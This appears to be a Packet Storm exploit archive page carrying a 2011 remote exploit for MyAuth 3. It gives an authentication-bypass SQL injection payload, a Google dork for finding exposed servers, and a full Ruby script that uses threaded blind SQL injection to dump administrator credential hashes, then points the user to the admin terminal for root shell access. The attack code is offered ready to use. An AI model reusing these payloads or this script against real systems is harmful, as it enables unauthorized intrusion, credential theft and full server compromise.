exploit the possibilities

MyAuth 3 Blind SQL Injection

MyAuth 3 Blind SQL Injection
Posted Sep 9, 2011
Authored by Marcio Almeida

MyAuth version 3 remote blind SQL injection exploit that allows for access to a root shell.

tags | exploit, remote, shell, root, sql injection
MD5 | 95079b5dfaf96d2cdb7f4673893fee7f

MyAuth 3 Blind SQL Injection

Change Mirror Download
# Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit
# Google Dork: allinurl:1881/?console=panel
# Date: 09/06/2011
# Author: Marcio Almeida (marcio[at]alligatorteam[dot]org | @marcioalm)
# Version: 3.0
# Tested on: Linux

#EDB-Note: apparently no true exploit is needed to dump system pwd hashes, because the admin myauth users have the ability to run a terminal session

---------------
PoC (POST data)
---------------
URL:
http://localhost:1881/index.php?console=panel

POST Data (Authentication bypass):
panel_cmd=auth&r=ok&user=alligatorteam&pass=' or 1=1#
---------------

This application has a accessible root shell in the admin interface located at:

http://localhost:1881/admin/

When you access it, just go to tools / terminal menu and g0t r00t!

The following code will manage all the dirty work for you!

enjoy ;-)

############## EXPLOIT CODE [myauth3_xpl.rb] ##################

require "net/http"
require "net/https"
require "erb"
require "singleton"
require 'uri'

sql = "select concat(user,0x20,pass) from admusers where enable = 1 and accesslevel >= 20"
@target = ARGV[0]
numthreads = ARGV[1]
@verbose = ARGV[2]
@cookie = ""

puts "+=============================================================================+"
puts "| MyAuth 3 - Blind SQL Injection / Root Shell Access 0day exploit |"
puts "| Google Dork: allinurl:1881/?console=panel |"
puts "| author: Marcio Almeida (marcio@alligatorteam.org) |"
puts "| |"
puts "| by Alligator Security Team | irc://irc.freenode.net:8001/#Alligator |"
puts "| twitter: @alligatorteam |"
puts "+=============================================================================+"
puts
if (ARGV[0].nil? || ARGV[1].nil?)

puts "usage (non verbose): ruby -W0 #{__FILE__} address num_threads"
puts "usage (verbose): ruby -W0 #{__FILE__} address num_threads -v"
puts "-----------------------------------------------------------"
puts "Example 1: ruby -W0 #{__FILE__} 127.0.0.1 5"
puts "Example 2: ruby -W0 #{__FILE__} www.vulnsite.com.br 5 -v"
exit(0)
end

def requisicao(posicao,p_substr,sql)
useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1'
@http = Net::HTTP.new(@target, 1881)
# @http.use_ssl = true
parametro = "panel_cmd=auth&r=ok&user=alligatorteam&pass=' or #{posicao} >= ascii(substr((#{sql}),#{p_substr.to_s},1))#"
begin
resp, data = @http.post2("/index.php?console=panel", parametro, {'User-Agent' => useragent, 'Cookie' => @cookie.to_s })
resultado = data.match(/Financeiro/)
rescue Exception=>e
puts e
end
if resultado.nil?
return false
else
return true
end
end

def busca_r( menor, maior, p_substr,sql )
return -1 if menor > maior
return maior if (maior-menor)==1
posicao = (menor+maior)/2
if (requisicao(posicao,p_substr,sql))
busca_r( menor, posicao, p_substr,sql )
else
busca_r( posicao, maior,p_substr,sql )
end
end

def busca_sql(inicio, qtdThreads, sql, str_final)
resultado = 0
while (resultado != 1) do
str_final[inicio] = ""
resultado = busca_r(0,255,inicio,sql)
if resultado != 1
if @verbose == "-v"
puts inicio.to_s+") Character Found: "+resultado.to_s+" - "+resultado.chr.to_s
end
str_final[inicio] += resultado.chr.to_s
inicio = inicio + qtdThreads.to_i
end
end
end

def busca_com_threads(sql, numthreads)
str_final = []

threads = []
count = 1
numthreads.to_i.times{|i|
threads << Thread.new {
busca_sql(count, numthreads, sql, str_final)
}
count += 1
}

threads.each do |t|
t.join
end

puts str_final.to_s

end

puts "When you crack any of the following hashes, go to http://"+ @target + ":1881/admin to login into the application."
puts "Then go to tools / terminal menu and get a r00t shell access ;-)"
puts "=========================================================================="
puts "[+] admusers table dumping... (maybe it'll take a little bit of time...)"
puts "=========================================================================="

100.times { |i|
busca_com_threads(sql+" limit 1 offset " + i.to_s, numthreads)
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    4 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close